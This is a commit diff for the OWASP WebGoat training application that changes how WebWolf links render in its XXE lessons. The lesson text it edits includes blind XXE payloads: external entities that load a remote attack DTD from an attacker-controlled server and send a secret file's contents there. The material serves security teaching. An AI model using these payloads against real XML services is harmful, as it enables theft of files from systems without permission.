XXE lesson not showing correct link for WebWolf

webgoat-container/src/main/java/org/owasp/webgoat/asciidoc/WebWolfMacro.java

@@ -10,6 +10,12 @@ import org.springframework.web.context.request.ServletRequestAttributes;
 import javax.servlet.http.HttpServletRequest;
 import java.util.Map;
 
+/**
+ * Usage in asciidoc:
+ * <p>
+ * webWolfLink:here[] will display a href with here as text
+ * webWolfLink:landing[noLink] will display the complete url, for example: http://WW_HOST:WW_PORT/landing
+ */
 public class WebWolfMacro extends InlineMacroProcessor {
 
     public WebWolfMacro(String macroName, Map<String, Object> config) {
@@ -20,9 +26,17 @@ public class WebWolfMacro extends InlineMacroProcessor {
     protected String process(AbstractBlock parent, String target, Map<String, Object> attributes) {
         Environment env = EnvironmentExposure.getEnv();
         String hostname = determineHost(env.getProperty("webwolf.host"), env.getProperty("webwolf.port"));
+
+        if (displayCompleteLinkNoFormatting(attributes)) {
+            return hostname + (hostname.endsWith("/") ? "" : "/") + target;
+        }
         return "<a href=\"" + hostname + "\" target=\"_blank\">" + target + "</a>";
     }
 
+    private boolean displayCompleteLinkNoFormatting(Map<String, Object> attributes) {
+        return attributes.values().stream().filter(a -> a.equals("noLink")).findFirst().isPresent();
+    }
+
     /**
      * Look at the remote address from received from the browser first. This way it will also work if you run
      * the browser in a Docker container and WebGoat on your local machine.

webgoat-container/src/main/java/org/owasp/webgoat/users/UserTracker.java

@@ -52,6 +52,7 @@ public class UserTracker {
     @Id
     @GeneratedValue(strategy = GenerationType.AUTO)
     private Long id;
+    @Column(name = "username")
     private String user;
     @OneToMany(cascade = CascadeType.ALL, fetch = FetchType.EAGER)
     private Set<LessonTracker> lessonTrackers = Sets.newHashSet();

webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc

@@ -1,4 +1,3 @@
-
 == Blind XXE
 
 In some cases you will see no output because although your attack might have worked the field is not reflected in the output of page.
@@ -6,25 +5,25 @@ Or the resource you are trying to read contains illegal XML character which caus
 Let's start with an example, in this case we reference an external DTD which we control on our own server.
 
 As an attacker you have WebWolf under your control (*this can be any server under your control.*), you can for example
-use this server to ping it using `http://localhost:8081/ping?text=HelloWorld
+use this server to ping it using `webWolfLink:landing[noLink]`
 
 How do we use this endpoint to verify whether we can perform XXE?
 
 We can again use WebWolf to host a file called `attack.dtd`, create this file with the following contents:
 
-[source]
+[source, subs="macros, specialcharacters"]
 ----
 <?xml version="1.0" encoding="UTF-8"?>
-<!ENTITY ping SYSTEM 'http://localhost:8081/ping?text=HelloWorld'>
+<!ENTITY ping SYSTEM 'webWolfLink:landing[noLink]'>
 ----
 
 Now submit the form change the xml using to:
 
-[source]
+[source, subs="macros, specialcharacters"]
 ----
 <?xml version="1.0"?>
 <!DOCTYPE root [
-<!ENTITY % remote SYSTEM "http://localhost:8081/WebWolf/files/attack.dtd">
+<!ENTITY % remote SYSTEM "webWolfLink:files/attack.dtd[noLink]">
 %remote;
 ]>
 <comment>

webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc

@@ -18,6 +18,6 @@ DTD.
 |`/home/webgoat/.webgoat-webGoatVersion:version[]/XXE/secret.txt`
 |===
 
-Try to upload this file using WebWolf landing page for example: `http://localhost:8081/WebWolf/landing?text=[contents_file]`
+Try to upload this file using WebWolf landing page for example: `webWolfLink:landing?text=contents_file[noLink]`
 (NOTE: this endpoint is under your full control)
 Once you obtained the contents of the file post it as a new comment on the page and you will solve the lesson.